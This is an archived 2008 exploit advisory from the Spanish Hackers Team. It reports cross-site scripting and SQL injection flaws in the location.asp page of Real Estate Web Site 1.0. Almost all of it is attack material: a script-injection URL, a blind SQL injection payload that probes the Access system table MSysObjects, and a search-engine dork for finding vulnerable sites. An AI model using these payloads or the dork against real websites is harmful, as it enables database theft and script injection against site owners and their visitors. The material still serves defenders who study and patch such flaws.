38 lines
No EOL
1.5 KiB
Text
38 lines
No EOL
1.5 KiB
Text
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
|
|
--==+ Real Estate Web Site 1.0 (SQL/XSS) Multiple Remote Vulnerabilities +==--
|
|
--==+====================================================================================+==--
|
|
- dreaming of necessity is reason to comply -
|
|
|
|
|
|
[+] Info:
|
|
|
|
[~] Bug found by JosS
|
|
[~] sys-project[at]hotmail.com
|
|
[~] http://www.spanish-hackers.com
|
|
[~] EspSeC & Hack0wn!.
|
|
|
|
[~] Software: Real Estate Web Site 1.0
|
|
[~] HomePage: http://www.real-estate-website.org/
|
|
[~] Exploit: Multiple Remote Vulnerabilities [High]
|
|
|
|
[~] Dork: "powered by real-estate-website"
|
|
|
|
[+] Cross Site Scripting:
|
|
|
|
[~] Vuln file: location.asp
|
|
[~] Exploit: http://localhost/PATH/location.asp?name=[XSS]
|
|
[~] Example: http://localhost/PATH/location.asp?name="><script>alert('JosS')</script>
|
|
|
|
[+] Remote SQL Injection:
|
|
|
|
[~] Vuln file: location.asp
|
|
[~] Exploit: http://localhost/PATH/location.asp?name=JosS&location=[SQL]
|
|
[~] Example: IIF((select%20mid(last(Name),1,1)%20from%20(select%20top%2010%20Namee%20from%20MSysObjects))='a',0,'done')%00
|
|
|
|
|
|
--==+=================== Spanish Hackers Team (www.spanish-hackers.com) =================+==--
|
|
--==+ JosS +==--
|
|
--==+====================================================================================+==--
|
|
[+] [The End]
|
|
|
|
# milw0rm.com [2008-06-09] |